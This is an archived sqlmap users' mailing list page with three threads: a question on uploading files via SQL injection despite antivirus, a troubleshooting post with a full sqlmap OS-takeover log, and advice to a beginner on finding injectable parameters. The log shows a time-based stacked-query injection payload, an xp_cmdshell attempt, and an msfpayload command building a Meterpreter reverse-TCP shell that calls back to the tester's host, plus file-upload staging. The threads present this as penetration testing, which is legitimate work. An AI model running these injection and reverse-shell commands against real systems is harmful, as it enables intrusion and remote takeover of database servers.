http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[sqlmap-users] Upload file with SQL Injection

[Peter L. <myp...@gm...>]

Hi All,

Need help in uploading a non-malicious file on vulnerable target.

In several cases I noted that shell upload or meterpreter fails due to an
effective & active Anti-Virus installed on vulnerable target as it got
delete due to malicious nature (even after certain level of msf encoding.

I also noted that in most of the cases method of uploading using
--sql-shell fail due to lack of stack-query related issues.

In that case is there a way to upload a file which is not malicious if
objective is not to take control of system and just requires uploading a
file.

[sqlmap-users] Error with operating system takeover (meterpreter)

[Peter L. <myp...@gm...>]

Hi All,

In first phase of our test we discovered Target URL is vulnerable and we
managed to retrieved lots of information such as --users, --dbs, some of
--tables and lots more. All this retrieval was very slow probably due to
time-based vulnerability; however tried through all (BEUSTQ) and found same
state.

During an attempt after few days of our success we noticed some of the
parameter is not working and we are receiving errors like for instance
during requery for --users we received error "[09:39:23] [CRITICAL] unable
to retrieve the number of database users". During requery for -U sa
--passwords we received "unnable to retrieve the password hashes for the
database users (probably because the session user has no read privileges
over the relevant system database table)".

We moved to OS takeover, initially get error for xp_cmdshell however
activated and confirmed using SQLNinja and moved on to get --os-shell,
executed some of commands like "hostname", "whoami" and successfully
retrieved its output.

Now after few minutes we noted that we are not getting any output of any
command with message "No output".

We moved to --os-pwn + --msf-path, But again with no success on meterpreter
or VNC.
received error "HTTP error codes detected during run:
404 (Not Found) - 1 times"

I'm attaching screen log, please help me with this if thr is any scope
available.
Thanks in Advance.



-------screen logs start-------

root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
--dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
test_msf7 -v 2
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
mutual consent is illegal. It is the end user's responsibility to obey all
applicable local, state and federal laws. Developers assume no liability
and are not responsible for any misuse or damage caused by this program

[*] starting at 10:03:33

mytarget_login
[10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
[10:03:33] [DEBUG] not a valid WebScarab log data
[10:03:33] [DEBUG] cleaning up configuration parameters
test_msf7
mytarget_login
/opt/metasploit/apps/pro/msf3
[10:03:33] [INFO] setting file for logging HTTP traffic
[10:03:33] [DEBUG] setting the HTTP timeout
[10:03:33] [DEBUG] creating HTTP requests opener object
[10:03:33] [DEBUG] forcing back-end DBMS to user defined value
[10:03:33] [DEBUG] setting the takeover out-of-band functionality
[10:03:33] [DEBUG] provided Metasploit Framework path
'/opt/metasploit/apps/pro/msf3' is valid
[10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
[10:03:33] [DEBUG] resolving hostname 'mytarget.com'
[10:03:33] [INFO] testing connection to the target URL
[10:03:48] [DEBUG] declared web page charset 'utf-8'
sqlmap got a 302 redirect to '
https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to follow?
[Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST
data to a new location? [Y/n] Y
[10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
reset by peer')
[10:03:56] [DEBUG] heuristically checking if the target is protected by
some kind of WAF/IPS/IDS
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Parameter: testNumber (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload:
example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
WAITFOR DELAY '0:0:5'--&testPassword=3243
    Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
[10:03:56] [INFO] testing Microsoft SQL Server
[10:03:56] [INFO] confirming Microsoft SQL Server
[10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
Ā as temporary files directory
[10:04:00] [INFO] testing if current user is DBA
[10:04:00] [DEBUG] creating a support table to write commands standard
output to
[10:04:00] [WARNING] time-based comparison requires larger statistical
model, please wait..............................
[10:04:04] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
[10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
[10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:04] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[10:04:05] [ERROR] unable to retrieve xp_cmdshell output
[10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine
(default)
[2] Reverse TCP: Try to connect back from the database host to this
machine, on all ports example3ween the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine
tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine
tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [192.168.1.8]
which local port number do you want to use? [61371]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
[10:04:17] [DEBUG] executing local command:
/opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
/opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
"/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
[10:04:17] [INFO] creation in progress .................. done
[10:04:35] [DEBUG] the shellcode size is 308 bytes
[10:04:35] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo
Ā/tmpsebykt.exe'
[10:04:35] [DEBUG] going to upload the binary file with stacked query SQL
injection technique
[10:04:35] [INFO] using PowerShell to write the binary file content to file
'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe'
[10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpfidjf.txt,
please wait..
[10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmppsbcbi.ps1
[10:04:36] [DEBUG] executing the PowerShell base64-decoding script to write
the D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe file, please wait..
[10:04:37] [WARNING] if you experience problems with non-ASCII identifier
names you are advised to rerun with '--tamper=charunicodeencode'
[10:04:37] [DEBUG] checking the length of the remote file D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe
[10:04:37] [INFO] retrieved:
[10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
[10:04:37] [WARNING] it looks like the file has not been written (usually
occurs if the DBMS process' user has no write privileges in the destination
path)
do you want to try to upload the file with the custom Visual Basic script
technique? [Y/n] Y
[10:04:41] [INFO] using a custom visual basic script to write the binary
file content to file 'D:\Program Files\Microsoft SQL
Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpsebykt.exe', please wait..
[10:04:41] [DEBUG] uploading the file base64-encoded content to D:\Program
Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
Ā\tmpfegab.txt,
please wait..
[10:04:41] [CRITICAL] page not found (404)
[10:04:41] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that
some kind of protection is involved (e.g. WAF)

[*] shutting down at 10:04:41

root@kali:~#


-------screen logs end-------


Please help!!

Re: [sqlmap-users] Sqlmap Beginner

[Miroslav S. <mir...@gm...>]

Hi.

If you are using only GET parameters to pass arguments to your web
application then you could manually find all different links on your web
site containing parameters. Then you should pass those to sqlmap (e.g. by
enlisting them line by line in a file and using option -m to pass such file
to sqlmap or one by one by using option -u).

Also, you can let sqlmap do all the crawling stuff by using e.g.: --crawl 2
--forms.

In case of more advanced cases you should use MiTM proxy (e.g. Burp) and
pass the requests of interest (containing GET and/or POST parameters) by
either option -r or by option -l.

Bye
On Jun 30, 2015 12:07 PM, "Savita" <sav...@qs...> wrote:

> Hi All,
>
>
>
> I am doing some security tests on a web application and I decided to test
> sqlmap for the first time. From the tutorial post I understood that we need
> to pass a target URL to Sqlmap. But I am not getting, how to get a
> vulnerable URL from our website. Do I need to traverse all the pages of
> website to get vulnerable Url? What all attributes need to be tested to say
> testing for SQL Injection completed? Could you please help me to resolve
> this? I am looking forward to hearing from you.
>
>
>
> Thank you,
>
> Savita
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Sqlmap Beginner

[Savita <sav...@qs...>]

Hi All,

 

I am doing some security tests on a web application and I decided to test
sqlmap for the first time. From the tutorial post I understood that we need
to pass a target URL to Sqlmap. But I am not getting, how to get a
vulnerable URL from our website. Do I need to traverse all the pages of
website to get vulnerable Url? What all attributes need to be tested to say
testing for SQL Injection completed? Could you please help me to resolve
this? I am looking forward to hearing from you.

 

Thank you,

Savita